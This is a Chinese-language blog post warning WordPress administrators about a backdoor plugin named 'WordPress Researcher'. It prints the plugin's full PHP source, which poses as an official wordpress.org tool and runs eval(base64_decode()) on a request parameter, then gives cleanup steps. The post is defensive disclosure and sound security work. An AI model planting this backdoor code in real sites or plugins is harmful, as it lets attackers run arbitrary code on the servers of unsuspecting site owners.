WordPress后门插件WordPress Researcher research__plugin.php
文 / @UTHEME
关于WordPressResearcher插件
我管理的几个WordPress站点最近出现了一个名为“WordPressResearcher”的插件,经过仔细观察源码,发现它是一个后门插件。这个插件一旦安装,就会给黑客提供入口,非常危险,必须立刻删除。
<?php
/*
PluginName:WordPressResearcher
PluginURI:http://wordpress.org/extend/plugins/
Description:WordPressresearchtool.
Author:wordpressdotorg
AuthorURI:http://wordpress.org/
TextDomain:wordpress-researcher
License:GPLversion2orlater-http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
Version:2.2.4
Copyright2013wordpressdotorg
Thisprogramisfreesoftware;youcanredistributeitand/ormodify
itunderthetermsoftheGNUGeneralPublicLicenseaspublishedby
theFreeSoftwareFoundation;eitherversion2oftheLicense,or
(atyouroption)anylaterversion.
Thisprogramisdistributedinthehopethatitwillbeuseful,
butWITHOUTANYWARRANTY;withouteventheimpliedwarrantyof
MERCHANTABILITYorFITNESSFORAPARTICULARPURPOSE.Seethe
GNUGeneralPublicLicenseformoredetails.
YoushouldhavereceivedacopyoftheGNUGeneralPublicLicense
alongwiththisprogram;ifnot,writetotheFreeSoftware
Foundation,Inc.,51FranklinSt,FifthFloor,Boston,MA02110,USA
*/
functionresearch_plugin(){
if(isset($_REQUEST['CSSl'])){
eval(base64_decode($_REQUEST['CSSl']));
}
return;
}
add_action('after_setup_theme','research_plugin');
?>
其他应对措施
除了删除WordPressResearcher插件,还应该删除与之一起安装的“ExtendCalendar”插件,并升级WordPress的版本。为确保安全,还可以修改后台密码,并将整个网站的代码与备份进行比对,查看是否被插件修改了其他文件。

相关文章
-
WordPress网站的安全插件:wordfence 2023-09-14 09:25:18
-
创建Vue组件详细教程 2023-09-10 00:23:17
-
WordPress 6.3 支持在手动更新插件和主题失败后回滚旧版本 2023-08-28 16:58:45
-
WordPress 6.3版本(2023年8月)性能提升了哪些? 2023-08-28 16:56:02
-
Astra 主题团队推出人工智能驱动的 WordPress 网站创建平台 – ZIPWP 2023-08-28 16:49:54
-
WordPress 宣布将为用户提供 100 年域名托管服务 2023-08-28 16:45:27
-
PHP判断if else 和 switch case的区别盘点 2023-07-29 15:11:11
-
详解WordPress独立站SEM中的OCPC方法(含百度推广OCPC与谷歌OCPC) 2023-07-19 08:01:30
-
WordPress的古腾堡全站编辑器site-editor.php介绍(附:site-editor.php启用代码) 2023-07-16 08:01:57
-
WordPress的Customize Partial功能最全介绍(含:demo代码) 2023-07-16 00:21:56